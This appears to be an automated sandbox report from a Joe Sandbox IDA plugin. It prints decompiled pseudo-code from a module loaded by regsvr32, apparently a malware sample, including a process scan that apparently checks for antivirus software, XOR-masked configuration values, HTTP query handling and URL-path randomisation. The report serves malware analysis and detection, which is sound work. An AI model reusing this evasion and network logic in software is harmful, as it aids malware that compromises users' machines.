                    										goto L19;
                    									}
                    								}
                    								L22:
                    								_t39 = _v12;
                    								 *((intOrPtr*)( *_t39 + 8))(_t39);
                    							}
                    						}
                    					} else {
                    						_t64 = GetLastError();
                    						if(_t64 != 0x3e5) {
                    							L8:
                    							if(_t64 == 0) {
                    								goto L9;
                    							}
                    						} else {
                    							_t64 = E04F95867( *(_t69 + 0x1c), _t58, 0xffffffff);
                    							if(_t64 == 0) {
                    								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    								goto L8;
                    							}
                    						}
                    					}
                    					return _t64;
                    				} else {
                    					_t54 = E04F958EE(__ecx, __eax);
                    					if(_t54 != 0) {
                    						return _t54;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}

                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04F92409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04F92422
                    • ResetEvent.KERNEL32(?), ref: 04F9249B
                    • GetLastError.KERNEL32 ref: 04F924B6
                      • Part of subcall function 04F958EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04F95905
                      • Part of subcall function 04F958EE: SetEvent.KERNEL32(?), ref: 04F95915
                      • Part of subcall function 04F958EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04F95947
                      • Part of subcall function 04F958EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9596C
                      • Part of subcall function 04F958EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9598C
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 2791f8ae5e213772ed6d043c77a6dfb8a6a5e2e2283b6cbb8e697f50992caf88
                    • Instruction ID: 94de3b99ea10028df7be3c359281bbb2849a5ae5af1e6b6718a32d178ff9ac1b
                    • Opcode Fuzzy Hash: 2791f8ae5e213772ed6d043c77a6dfb8a6a5e2e2283b6cbb8e697f50992caf88
                    • Instruction Fuzzy Hash: C541B432E00204BBFF229FA9DC44E9A77F9AF84364F1609A4E555D3151EB30FD469B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E04F93FD2(signed int _a4, signed int* _a8) {
                    				void* __ecx;
                    				void* __edi;
                    				signed int _t6;
                    				intOrPtr _t8;
                    				intOrPtr _t12;
                    				short* _t19;
                    				void* _t25;
                    				void* _t26;
                    				signed int* _t28;
                    				CHAR* _t30;
                    				long _t31;
                    				intOrPtr* _t32;
                    
                    				_t6 =  *0x4f9a310; // 0xd448b889
                    				_t32 = _a4;
                    				_a4 = _t6 ^ 0x109a6410;
                    				_t8 =  *0x4f9a320; // 0xb2d5a8
                    				_t3 = _t8 + 0x4f9b87e; // 0x61636f4c
                    				_t25 = 0;
                    				_t30 = E04F932D0(_t3, 1);
                    				if(_t30 != 0) {
                    					_t25 = CreateEventA(0x4f9a34c, 1, 0, _t30);
                    					E04F917AB(_t30);
                    				}
                    				_t12 =  *0x4f9a2fc; // 0x4000000a
                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04F92AB4() != 0) {
                    					L12:
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 =  *_t28 | 0x00000001;
                    					}
                    					_t31 = E04F9196A(_t32, _t26);
                    					if(_t31 == 0 && _t25 != 0) {
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    					}
                    					if(_t28 != 0 && _t31 != 0) {
                    						 *_t28 =  *_t28 & 0xfffffffe;
                    					}
                    					goto L20;
                    				} else {
                    					_t19 =  *0x4f9a118( *_t32, 0x20);
                    					if(_t19 != 0) {
                    						 *_t19 = 0;
                    						_t19 = _t19 + 2;
                    					}
                    					_t31 = E04F978DB(0,  *_t32, _t19, 0);
                    					if(_t31 == 0) {
                    						if(_t25 == 0) {
                    							L22:
                    							return _t31;
                    						}
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    						if(_t31 == 0) {
                    							L20:
                    							if(_t25 != 0) {
                    								CloseHandle(_t25);
                    							}
                    							goto L22;
                    						}
                    					}
                    					goto L12;
                    				}
                    			}

                    APIs
                      • Part of subcall function 04F932D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05AC9D58,00000000,?,?,69B25F44,00000005,04F9A00C,4D283A53,?,?), ref: 04F93306
                      • Part of subcall function 04F932D0: lstrcpy.KERNEL32(00000000,00000000), ref: 04F9332A
                      • Part of subcall function 04F932D0: lstrcat.KERNEL32(00000000,00000000), ref: 04F93332
                    • CreateEventA.KERNEL32(04F9A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04F9186F,?,?,?), ref: 04F94013
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,04F9186F,00000000,00000000,?,00000000,?,04F9186F,?,?,?), ref: 04F94071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04F9186F,?,?,?), ref: 04F9409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04F9186F,?,?,?), ref: 04F940B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: 26be070403fd9de3876a5ae6a1b3fa098fda649675750979b0ed27a7df7c3ce2
                    • Instruction ID: f2c7bcfbbd400ddd6a798cdab39ffd544976d09c78cc6bcf5f6a44464a7aac2d
                    • Opcode Fuzzy Hash: 26be070403fd9de3876a5ae6a1b3fa098fda649675750979b0ed27a7df7c3ce2
                    • Instruction Fuzzy Hash: C0214632D14305BBFF315B68AC84E6B73E8EF98B14F050218F9569B222DB61EC038655
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E04F917C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                    				intOrPtr _v12;
                    				void* _v16;
                    				void* _v28;
                    				char _v32;
                    				void* __esi;
                    				void* _t29;
                    				void* _t38;
                    				signed int* _t39;
                    				void* _t40;
                    
                    				_t36 = __ecx;
                    				_v32 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v12 = _a4;
                    				_t38 = E04F96710(__ecx,  &_v32);
                    				if(_t38 != 0) {
                    					L12:
                    					_t39 = _a8;
                    					L13:
                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                    						_t23 =  &(_t39[1]);
                    						if(_t39[1] != 0) {
                    							E04F9238A(_t23);
                    						}
                    					}
                    					return _t38;
                    				}
                    				if(E04F940C7(0x40,  &_v16) != 0) {
                    					_v16 = 0;
                    				}
                    				_t40 = CreateEventA(0x4f9a34c, 1, 0,  *0x4f9a3e4);
                    				if(_t40 != 0) {
                    					SetEvent(_t40);
                    					Sleep(0xbb8);
                    					CloseHandle(_t40);
                    				}
                    				_push( &_v32);
                    				if(_a12 == 0) {
                    					_t29 = E04F95E53(_t36);
                    				} else {
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_t29 = E04F92B1E(_t36);
                    				}
                    				_t41 = _v16;
                    				_t38 = _t29;
                    				if(_v16 != 0) {
                    					E04F94B59(_t41);
                    				}
                    				if(_t38 != 0) {
                    					goto L12;
                    				} else {
                    					_t39 = _a8;
                    					_t38 = E04F93FD2( &_v32, _t39);
                    					goto L13;
                    				}
                    			}

                    APIs
                    • CreateEventA.KERNEL32(04F9A34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 04F91811
                    • SetEvent.KERNEL32(00000000), ref: 04F9181E
                    • Sleep.KERNEL32(00000BB8), ref: 04F91829
                    • CloseHandle.KERNEL32(00000000), ref: 04F91830
                      • Part of subcall function 04F95E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,04F91850,?,04F91850,?,?,?,?,?,04F91850,?), ref: 04F95F2D
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: 4fc735299632e8bae99882475e13e94c5876f971b2a3bde55ac572bd036ab808
                    • Instruction ID: 9a97b73e8b52491d24e48b8d191ca3146e6bec825216afa3d37a764df7166bc3
                    • Opcode Fuzzy Hash: 4fc735299632e8bae99882475e13e94c5876f971b2a3bde55ac572bd036ab808
                    • Instruction Fuzzy Hash: 2F21D373E0010ABBFF20AFF489809DE73E9EB04350B014479E921A3100DB75BD079BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E04F95ACD(unsigned int __eax, void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _t21;
                    				signed short _t23;
                    				char* _t27;
                    				void* _t29;
                    				void* _t30;
                    				unsigned int _t33;
                    				void* _t37;
                    				unsigned int _t38;
                    				void* _t41;
                    				void* _t42;
                    				int _t45;
                    				void* _t46;
                    
                    				_t42 = __eax;
                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                    				_t38 = __eax;
                    				_t30 = RtlAllocateHeap( *0x4f9a2d8, 0, (__eax >> 3) + __eax + 1);
                    				_v12 = _t30;
                    				if(_t30 != 0) {
                    					_v8 = _t42;
                    					do {
                    						_t33 = 0x18;
                    						if(_t38 <= _t33) {
                    							_t33 = _t38;
                    						}
                    						_t21 =  *0x4f9a2f0; // 0xcfe3a42c
                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                    						 *0x4f9a2f0 = _t23;
                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                    						memcpy(_t30, _v8, _t45);
                    						_v8 = _v8 + _t45;
                    						_t27 = _t30 + _t45;
                    						_t38 = _t38 - _t45;
                    						_t46 = _t46 + 0xc;
                    						 *_t27 = 0x2f;
                    						_t13 = _t27 + 1; // 0x1
                    						_t30 = _t13;
                    					} while (_t38 > 8);
                    					memcpy(_t30, _v8, _t38 + 1);
                    				}
                    				return _v12;
                    			}

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F9194D,00000000,?,?,04F96ABB,?,05AC95B0), ref: 04F95AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F95AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F9194D,00000000,?,?,04F96ABB,?,05AC95B0), ref: 04F95B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 04F95B55
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: 8233c94d4261d1b689566148a1686088144cc1167107a325e0cfff13d7a71d53
                    • Instruction ID: 8f71ef2ad36cea8968b04d3ca6a5b27a4d0a403a74974ac5aac3438ae0460f40
                    • Opcode Fuzzy Hash: 8233c94d4261d1b689566148a1686088144cc1167107a325e0cfff13d7a71d53
                    • Instruction Fuzzy Hash: 45110672E00218BFEB158F69EC84E9EBBEDEB80360B050166F50497250EB75AE05C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E04F92AB4() {
                    				char _v264;
                    				void* _v300;
                    				int _t8;
                    				intOrPtr _t9;
                    				int _t15;
                    				void* _t17;
                    
                    				_t15 = 0;
                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                    				if(_t17 != 0) {
                    					_t8 = Process32First(_t17,  &_v300);
                    					while(_t8 != 0) {
                    						_t9 =  *0x4f9a320; // 0xb2d5a8
                    						_t2 = _t9 + 0x4f9bea8; // 0x73617661
                    						_push( &_v264);
                    						if( *0x4f9a110() != 0) {
                    							_t15 = 1;
                    						} else {
                    							_t8 = Process32Next(_t17,  &_v300);
                    							continue;
                    						}
                    						L7:
                    						CloseHandle(_t17);
                    						goto L8;
                    					}
                    					goto L7;
                    				}
                    				L8:
                    				return _t15;
                    			}

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04F92AC4
                    • Process32First.KERNEL32(00000000,?), ref: 04F92AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 04F92B03
                    • CloseHandle.KERNEL32(00000000), ref: 04F92B12
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: 65179fc1902c59a2425fffb8ed1f2a54726d9e2fc5eb914828dbf126b0224108
                    • Instruction ID: 445d5dd784d0329b2db0d51815e3667b7167bdfeb422bee0e35e6088fa179305
                    • Opcode Fuzzy Hash: 65179fc1902c59a2425fffb8ed1f2a54726d9e2fc5eb914828dbf126b0224108
                    • Instruction Fuzzy Hash: C9F06232A011287AFF21AF25AC49DEB37ECDB85214B020491F915D3000EA24AD878AA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F96156(void* __esi) {
                    				struct _SECURITY_ATTRIBUTES* _v4;
                    				void* _t8;
                    				void* _t10;
                    
                    				_v4 = 0;
                    				memset(__esi, 0, 0x38);
                    				_t8 = CreateEventA(0, 1, 0, 0);
                    				 *(__esi + 0x1c) = _t8;
                    				if(_t8 != 0) {
                    					_t10 = CreateEventA(0, 1, 1, 0);
                    					 *(__esi + 0x20) = _t10;
                    					if(_t10 == 0) {
                    						CloseHandle( *(__esi + 0x1c));
                    					} else {
                    						_v4 = 1;
                    					}
                    				}
                    				return _v4;
                    			}







                    APIs
                    • memset.NTDLL ref: 04F96164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04F96179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04F96186
                    • CloseHandle.KERNEL32(?), ref: 04F96198
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: 228db007bf6b4dc088778f581b3f78a98f269dd9b7e714163678b183749c3e8f
                    • Instruction ID: a23791e2a2674916700e5c4466887fa8e2ad9eb5e1509a9e9cee5e71d61ec5b9
                    • Opcode Fuzzy Hash: 228db007bf6b4dc088778f581b3f78a98f269dd9b7e714163678b183749c3e8f
                    • Instruction Fuzzy Hash: CEF03AF150430C7FF6105F22EC80C27BBACFB812D8B12492DB14681111DA76BC568A70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F9137B() {
                    				void* _t1;
                    				intOrPtr _t5;
                    				void* _t6;
                    				void* _t7;
                    				void* _t11;
                    
                    				_t1 =  *0x4f9a30c; // 0x2e8
                    				if(_t1 == 0) {
                    					L8:
                    					return 0;
                    				}
                    				SetEvent(_t1);
                    				_t11 = 0x7fffffff;
                    				while(1) {
                    					SleepEx(0x64, 1);
                    					_t5 =  *0x4f9a358; // 0x0
                    					if(_t5 == 0) {
                    						break;
                    					}
                    					_t11 = _t11 - 0x64;
                    					if(_t11 > 0) {
                    						continue;
                    					}
                    					break;
                    				}
                    				_t6 =  *0x4f9a30c; // 0x2e8
                    				if(_t6 != 0) {
                    					CloseHandle(_t6);
                    				}
                    				_t7 =  *0x4f9a2d8; // 0x56d0000
                    				if(_t7 != 0) {
                    					HeapDestroy(_t7);
                    				}
                    				goto L8;
                    			}









                    APIs
                    • SetEvent.KERNEL32(000002E8,00000001,04F910AA), ref: 04F91386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 04F91395
                    • CloseHandle.KERNEL32(000002E8), ref: 04F913B6
                    • HeapDestroy.KERNEL32(056D0000), ref: 04F913C6
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 0a565e80f3cfd1cafcd59127a21ca460cdfbc997a232cc19000c36fa294a0826
                    • Instruction ID: 225df298d30ef2b175da97de5f868a98e33d44e376faee40989d0c903ccd6b3b
                    • Opcode Fuzzy Hash: 0a565e80f3cfd1cafcd59127a21ca460cdfbc997a232cc19000c36fa294a0826
                    • Instruction Fuzzy Hash: F8F01C75F01256ABFB30AB35F948F563BF8EB04761B050628BC61D2791DE69EC409960
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F95231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                    				struct _FILETIME _v12;
                    				void* _t11;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				signed short* _t24;
                    
                    				_t22 = __edx;
                    				_t23 = E04F95406(_t11, _a12);
                    				if(_t23 == 0) {
                    					_t20 = 8;
                    				} else {
                    					_t24 = _t23 + _a16 * 2;
                    					 *_t24 =  *_t24 & 0x00000000;
                    					_t20 = E04F915E6(__ecx, _a4, _a8, _t23);
                    					if(_t20 == 0) {
                    						GetSystemTimeAsFileTime( &_v12);
                    						 *_t24 = 0x5f;
                    						_t20 = E04F95B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                    					}
                    					HeapFree( *0x4f9a2d8, 0, _t23);
                    				}
                    				return _t20;
                    			}










                    APIs
                      • Part of subcall function 04F95406: lstrlen.KERNEL32(?,00000000,05AC9D58,00000000,04F93C77,05AC9F7B,69B25F44,?,?,?,?,69B25F44,00000005,04F9A00C,4D283A53,?), ref: 04F9540D
                      • Part of subcall function 04F95406: mbstowcs.NTDLL ref: 04F95436
                      • Part of subcall function 04F95406: memset.NTDLL ref: 04F95448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05AC93CC), ref: 04F95268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05AC93CC), ref: 04F95295
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: 2fe438494106eeef1a014a210e74087de8f6f32146af52d87a2b94ffefa9b0ba
                    • Instruction ID: e80a605500bbd7e0ca210b5b79d9d2371c2645b8273dd879e9b881189b6d0234
                    • Opcode Fuzzy Hash: 2fe438494106eeef1a014a210e74087de8f6f32146af52d87a2b94ffefa9b0ba
                    • Instruction Fuzzy Hash: 82014F32600209BBEF125F94EC44E9B7BB9FB84744F504429FA009A160EBB1ED66D760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E04F9395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                    				intOrPtr* _v8;
                    				void* _t17;
                    				intOrPtr* _t22;
                    				void* _t27;
                    				char* _t30;
                    				void* _t33;
                    				void* _t34;
                    				void* _t36;
                    				void* _t37;
                    				void* _t39;
                    				int _t42;
                    
                    				_t17 = __eax;
                    				_t37 = 0;
                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                    				_t2 = _t17 + 1; // 0x1
                    				_t28 = _t2;
                    				_t34 = E04F963FD(_t2);
                    				if(_t34 != 0) {
                    					_t30 = E04F963FD(_t28);
                    					if(_t30 == 0) {
                    						E04F917AB(_t34);
                    					} else {
                    						_t39 = _a4;
                    						_t22 = E04F9799A(_t39);
                    						_v8 = _t22;
                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                    							_a4 = _t39;
                    						} else {
                    							_t26 = _t22 + 2;
                    							_a4 = _t22 + 2;
                    							_t22 = E04F9799A(_t26);
                    							_v8 = _t22;
                    						}
                    						if(_t22 == 0) {
                    							__imp__(_t34, _a4);
                    							 *_t30 = 0x2f;
                    							 *((char*)(_t30 + 1)) = 0;
                    						} else {
                    							_t42 = _t22 - _a4;
                    							memcpy(_t34, _a4, _t42);
                    							 *((char*)(_t34 + _t42)) = 0;
                    							__imp__(_t30, _v8);
                    						}
                    						 *_a8 = _t34;
                    						_t37 = 1;
                    						 *_a12 = _t30;
                    					}
                    				}
                    				return _t37;
                    			}















                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?,?,00000000), ref: 04F93967
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                      • Part of subcall function 04F9799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F93995,00000000,00000001,00000001,?,?,04F943F7,?,?,?,?,00000102), ref: 04F979A8
                      • Part of subcall function 04F9799A: StrChrA.SHLWAPI(?,0000003F,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?,?,00000000,00000000), ref: 04F979B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?), ref: 04F939C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F939D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04F939E1
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: a3e7c82282d9a20c09104b737c42c83bcbd3242513caf24ca3f46694f75f4d5c
                    • Instruction ID: c236400db6046611674019730c4ccc1d38a021949de271df1c663a217ae76256
                    • Opcode Fuzzy Hash: a3e7c82282d9a20c09104b737c42c83bcbd3242513caf24ca3f46694f75f4d5c
                    • Instruction Fuzzy Hash: 11219D72900259BBFF029F69CC44BAEBFF9DF09244B054058ED049B201E635ED06C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F9114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				void* _v8;
                    				void* _t18;
                    				int _t25;
                    				int _t29;
                    				int _t34;
                    
                    				_t29 = lstrlenW(_a4);
                    				_t25 = lstrlenW(_a8);
                    				_t18 = E04F963FD(_t25 + _t29 + _t25 + _t29 + 2);
                    				_v8 = _t18;
                    				if(_t18 != 0) {
                    					_t34 = _t29 + _t29;
                    					memcpy(_t18, _a4, _t34);
                    					_t10 = _t25 + 2; // 0x2
                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                    				}
                    				return _v8;
                    			}









                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,05AC93CC,?,04F93418,004F0053,05AC93CC,?,?,?,?,?,?,04F954F9), ref: 04F9115D
                    • lstrlenW.KERNEL32(04F93418,?,04F93418,004F0053,05AC93CC,?,?,?,?,?,?,04F954F9), ref: 04F91164
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04F93418,004F0053,05AC93CC,?,?,?,?,?,?,04F954F9), ref: 04F91184
                    • memcpy.NTDLL(74E069A0,04F93418,00000002,00000000,004F0053,74E069A0,?,?,04F93418,004F0053,05AC93CC), ref: 04F91197
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 28f5ad390f142e9e9a2f07c73c0a4f90a9c083aa60e1fe3ad3a79d8c2acfe455
                    • Instruction ID: 2e406c9fd6c7cb73ec65bba140c97f7e1649be69e51984d55bfed461bc04146c
                    • Opcode Fuzzy Hash: 28f5ad390f142e9e9a2f07c73c0a4f90a9c083aa60e1fe3ad3a79d8c2acfe455
                    • Instruction Fuzzy Hash: 2AF04F72900118BBEF11DFA9CC44C9E7BECEF08358B014062E908D7211E731EE158BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
